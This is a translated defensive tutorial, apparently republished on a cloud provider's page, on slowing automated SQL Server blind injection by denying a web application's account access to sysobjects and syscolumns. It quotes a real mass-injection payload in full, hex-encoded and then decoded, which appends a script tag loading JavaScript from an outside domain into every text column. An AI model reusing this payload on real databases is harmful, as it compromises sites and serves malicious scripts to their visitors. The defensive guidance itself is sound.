Delay SQL blind injection and SQL Server permissions (figure)

Source: Internet
Author: User

 

Source: Was

The so-called SQL blind injection is to use automated programs to automatically scan injection points and automatically scan data tables for large-scale batch injection, which is also harmful.

Here we will discuss a method related to SQL Server permission to delay SQL blind injection.

In general, the final injection code of SQL blind injection is similar to the following segment (SQL Server 2000/2005 ):

DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C006100720065002000400054002000560061007200630068006100720028003200   3500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063   006C0061007200650020005400610062006C0065005F0043007500720073006F00720020004300750072007300   6F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C0042002E   004E0061006D0065002000460072006F006D0020005300790073006F0062006A00650063007400730020004100   2C0053007900730063006F006C0075006D006E00730020004200200057006800650072006500200041002E0049   0064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D00270075002700   200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E0058   0074007900700065003D003300350020004F007200200042002E00580074007900700065003D00320033003100   20004F007200200042002E00580074007900700065003D00310036003700290020004F00700065006E00200054   00610062006C0065005F0043007500720073006F00720020004600650074006300680020004E00650078007400   2000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074   006F002000400054002C004000430020005700680069006C006500280040004000460065007400630068005F00   5300740061007400750073003D0030002900200042006500670069006E00200045007800650063002800270075   007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B0027002B0   0400043002B0027005D003D0052007400720069006D00280043006F006E0076006500720074002800560061007   20063006800610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B   00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F003300   620033002E006F00720067002F0063002E006A0073003E003C002F007300630072006900700074003E00270027   00270029004600650074006300680020004E006500780074002000460072006F006D0020002000540061006200   6C0065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E0   06400200043006C006F007300650020005400610062006C0065005F0043007500720073006F007200200044006   50061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200   aS NvArChAR(4000));ExEc(@S);--

The decryption is the following part:

Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From <strong>Sysobjects</strong> A,<strong>Syscolumns</strong> B Where A.Id=B.Id And A.Xtype=’u’ And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec(’update [’+@T+’] Set [’+@C+’]=Rtrim(Convert(Varchar(8000),[’+@C+’]))+’’<strong>《script src=http://3b3.org/c.js</strong><strong>》《/script》</strong>’’’) Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor

I replaced the script symbol.

We can also see the table name sysobjects and syscolumns marked in bold. SQL blind injection uses these two system tables for traversal.

So the method to temporarily delay SQL blind injection is to access the database account in the Program (Note: Do not use the default SA permission. We recommend that you create an access account for your web application.Remove access permissions to these system tables to avoid blind injection (I specifically noted that it is a blind injection, because the injection points still exist, just to delay the SQL blind injection.).

For example, if the account used by your web application to access the database is tnt001, the system table sysobjects and syscolumns are denied as follows:

SQL Server 2000 is relatively intuitive and simple, and SQL Server 2005 has completely reconstructed the entire system architecture, which is somewhat different. So here we take SQL Server 2005 as an example to describe in detail (similar to SQL Server 2008):

Step 1:Select a specific database, click "security"> "user" on the node, select the account you need, such as tnt001, and right-click "properties ".

Step 2: Select "security object" on the left of the property page"

Step 3: click the "add" button under the security object and select "all objects of the feature type"

 

Step 4: Select "View" and select sysobjects and syscolumns

Step 5: Select the "select" permissions for the selected views as denied

Click OK.

Use the account tnt001 to connect and access sysobjects to test the connection. The following message is displayed:

"The select permission on the object 'sysobjects' (Database 'mssqlsystemresource', architecture 'sys') is denied ."

The above method only delays SQL blind injection, because large-scale batch injection is automatically performed by the program. This method shields the program from blind injection attacks against such SQL Server databases, however, the SQL injection points still exist. If the injection is performed manually when relevant information is obtained, it cannot be avoided. The cure still needs to be completely modified from the source program.

However, due to the fact that the source code involved in the SQL injection vulnerability is very complex, the amount of code to review is large, this method of delaying SQL blind injection won some time for you to thoroughly investigate and modify programs with vulnerabilities.

 

 

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.